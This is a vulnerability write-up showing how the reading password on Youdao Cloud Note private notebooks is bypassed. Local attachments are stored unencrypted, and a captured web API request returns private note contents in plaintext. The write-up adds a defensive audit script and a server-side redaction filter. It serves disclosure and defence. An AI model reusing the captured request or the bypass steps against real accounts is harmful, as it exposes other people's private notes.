Bypassing the Youdao Cloud Note reading password
I am a fan of Youdao Cloud Note. I had nothing to test today.
Youdao Cloud Note has a private notebook feature: you must enter a reading password before the notebook can be read, so important material can be kept confidential. When you click on another notebook, a notebook that has a reading password is automatically locked again.
Improper design 1: private notebook attachments can be read at will
Find the storage directory of the notebook.
The folder names inside that directory are the checksums of the notes.
Then check whether the locally stored files of private notes are encrypted.
The answer is no: attachments of private notes stored locally are not encrypted.
In summary, the local attachments of private notes are accessible without the reading password.
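As an added example (not part of the original write-up and not Youdao's code), here is a small at-rest audit a defender can run over a local notes directory laid out the way the page describes, one folder per note checksum. It classifies each attachment as readable (recognised file header, or low byte entropy typical of uncompressed documents) or opaque (high entropy with no recognised header, as properly encrypted data would be). The directory contents, the magic-number table and the 7.0-bit entropy threshold are constructed for the example; the checksum folder name is the one that appears in the captured JSON further down the page.

```python
import math
import os
import tempfile
from collections import Counter

# Magic-number prefixes of common attachment formats (constructed list for this example).
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"%PDF-": "pdf",
    b"PK\x03\x04": "zip/docx/xlsx",
    b"GIF8": "gif",
}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; ciphertext is close to 8.0, text and most documents are well below."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def classify_attachment(path: str, sample_size: int = 4096) -> dict:
    """Report whether an attachment on disk looks readable without any key.

    A file is flagged 'plaintext' when it starts with a known magic number or its
    entropy is low enough to be uncompressed content; high-entropy data with no
    recognised header is reported as 'opaque' (encrypted or compressed).
    """
    with open(path, "rb") as fh:
        head = fh.read(sample_size)
    fmt = next((name for magic, name in MAGIC.items() if head.startswith(magic)), None)
    ent = shannon_entropy(head)
    verdict = "plaintext" if (fmt is not None or ent < 7.0) else "opaque"
    return {"path": path, "format": fmt, "entropy": round(ent, 2), "verdict": verdict}


def audit_directory(root: str) -> list:
    """Walk a notes directory (one folder per note checksum) and classify every file in it."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            results.append(classify_attachment(os.path.join(dirpath, name)))
    return results


def demo() -> list:
    """Build a constructed notes directory with one readable and one opaque attachment."""
    root = tempfile.mkdtemp(prefix="notes-audit-")
    # Folder named by note checksum, as on the page (value taken from the captured JSON).
    note_dir = os.path.join(root, "758d018393527ab0dcf1e185e21c4c60")
    os.makedirs(note_dir)
    with open(os.path.join(note_dir, "report.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4\n" + b"constructed confidential meeting notes\n" * 50)
    with open(os.path.join(note_dir, "secret.bin"), "wb") as fh:
        fh.write(os.urandom(4096))  # stands in for a properly encrypted blob
    return audit_directory(root)


if __name__ == "__main__":
    for row in demo():
        print(row)
```

Any attachment under a password-protected notebook that comes back as "plaintext" is readable by anyone with access to the profile directory, which is exactly the condition the write-up reports.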
Improper design 2: arbitrary viewing of private notes
Because this is a cloud note service, there are mobile, desktop and web clients.
Try logging in to the web version from the desktop client (client authorization --> web; here the client is already logged in, but we have entered neither the reading password nor the login password).
Find the client's jump link and click "invite friends" (my browser had all cookies cleared).
After a series of cross-origin authorization redirects to the website, we do not obtain authorization for the 126 and 163 mail domains at this point, only for youdao.com.
Clicking the mail icon now still requires a password to enter the mailbox.
Go to the web version of cloud notes.
The web version also asks for the password before showing private notes.
But the design is flawed: click on the private notes and capture the packets.
The private notes are listed at a glance. Whatever the "encrypted" field in the JSON shows, and however many private notes there are, they are all returned in plaintext as a JSON array.
Request:

POST /yws/mapi/search?method=get&keyfrom=web HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://note.youdao.com/web/list?notebook=%2FFBFBFA20CF98469F9BF19C1F53C1E772&sortMode=0&note=%2F6EDExxx
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Proxy-Connection: Keep-Alive
Content-Length: 70
Host: note.youdao.com
Pragma: no-cache
Cookie: xxxx

nb=%2FFBFBFA20xxxx

Response:

HTTP/1.1 200 OK
Server: Tengine
Date: Thu, 08 Jan 2015 05:05:33 GMT
Content-Type: text/json; charset=UTF-8
Content-Length: 589
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: zh-CN
Cache-Control: no-cache

[1,[{"d":0,"tl":"??¥è?°1","mt":1420693290,"nn":0,"tg":"","sc":0,"checksum":"758d018393527ab0dcf1e185e21c4c60","favorite":0,"ct":1420693196,"au":"","v":3563,"encrypted":0,"r":0,"p":"/FBFBFA20CF98469F9BF19C1F53C1E772/8AC2996E50B642EA9788D57B844F3399","su":"","created_product":"YNote-PC","ng":"","del":0,"pp":{"nbtl":"é??èˉ??ˉ****?μ?èˉ?","dg":"??ˉ********¨??·****??lisdfte??ˉ****ˉ****???te3st999332","thmurl":null,"WHOLE_FILE_TYPE":"OMAPFILE","ressize":"0","tp":"2","FILE_IDENTIFIER":"6B6A960617DC48DC8567DFB16D40A469","spaceused":"303","resnum":"1"},"et":0,"sz":3814,"er":0,"ps":0,"dr":0}]]
In short, the entire contents of private notes can be read, bypassing the reading-password protection.
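The fix for the second flaw belongs on the server: the listing endpoint must not return title, summary or digest fields for notes in a password-protected notebook until the session has presented that notebook's reading password. The following is an added example of such a response filter, not Youdao's code. The response shape (a status code followed by an array of note records) and the field names follow the capture above; the field meanings assumed here (tl = title, su = summary, p = notebook/note path, pp.dg = digest, pp.nbtl = notebook title) are assumptions about the API, and the sample records, notebook IDs and the set of protected notebooks are constructed. The filter keys on the notebook's server-side protection status rather than on the per-record "encrypted" flag, because the captured record carries "encrypted":0 even though it was returned while listing a private notebook.

```python
import json

# Constructed listing modelled on the captured response: [status, [note records]].
# Field meanings (tl, su, p, pp.dg, pp.nbtl) are assumptions about the API.
SAMPLE_RESPONSE = json.dumps([1, [
    {"tl": "shopping list", "checksum": "aaaa", "encrypted": 0, "su": "",
     "p": "/OPENBOOK0000/NOTE0001",
     "pp": {"nbtl": "Open notebook", "dg": "milk, eggs, bread", "resnum": "0"}},
    {"tl": "bank details", "checksum": "bbbb", "encrypted": 0, "su": "",
     "p": "/LOCKEDBOOK0000/NOTE0002",
     "pp": {"nbtl": "Private notebook", "dg": "account 1234 pin 5678", "resnum": "1"}},
]])

# Notebook IDs that carry a reading password (server-side configuration; constructed here).
PROTECTED_NOTEBOOKS = {"LOCKEDBOOK0000"}

# Fields that expose note content or its preview and must not leave the server for a locked note.
CONTENT_FIELDS = ("tl", "su", "tg")
PREVIEW_FIELDS = ("dg", "nbtl", "thmurl")


def notebook_of(note: dict) -> str:
    """The first path component of 'p' is the notebook id in the captured records (assumption)."""
    return note.get("p", "").strip("/").split("/")[0]


def redact_note(note: dict) -> dict:
    """Return a copy of the record with content and preview fields removed and a 'locked' marker set."""
    out = {k: v for k, v in note.items() if k not in CONTENT_FIELDS}
    out["pp"] = {k: v for k, v in note.get("pp", {}).items() if k not in PREVIEW_FIELDS}
    out["locked"] = 1
    return out


def filter_listing(raw: str, unlocked_notebooks: set) -> list:
    """Server-side filter: redact notes in protected notebooks the session has not unlocked.

    unlocked_notebooks is the set of notebook ids for which the current session has
    already presented the reading password; it is kept server-side and never taken
    from the client request.
    """
    status, notes = json.loads(raw)
    filtered = []
    for note in notes:
        nb = notebook_of(note)
        if nb in PROTECTED_NOTEBOOKS and nb not in unlocked_notebooks:
            filtered.append(redact_note(note))
        else:
            filtered.append(note)
    return [status, filtered]


def leaked_fields(raw: str, unlocked_notebooks: set) -> list:
    """Audit helper: names of content or preview fields still present on locked notes after filtering."""
    _, notes = filter_listing(raw, unlocked_notebooks)
    leaks = []
    for note in notes:
        if note.get("locked"):
            leaks += [f for f in CONTENT_FIELDS if f in note]
            leaks += [f for f in PREVIEW_FIELDS if f in note.get("pp", {})]
    return leaks


if __name__ == "__main__":
    # A session that has not entered the reading password sees only metadata for the private note.
    print(json.dumps(filter_listing(SAMPLE_RESPONSE, set()), indent=1))
    # After the password has been verified server-side, the same listing returns the full record.
    print(json.dumps(filter_listing(SAMPLE_RESPONSE, {"LOCKEDBOOK0000"}), indent=1))
```

The point of the design is that the unlock state lives in the server session, so a client that skipped the password prompt (as the write-up did by arriving through the cross-origin authorization jump) still receives nothing beyond checksums, timestamps and sizes for the locked notebook; a client-side lock that only hides data already delivered, as the captured traffic shows, protects nothing.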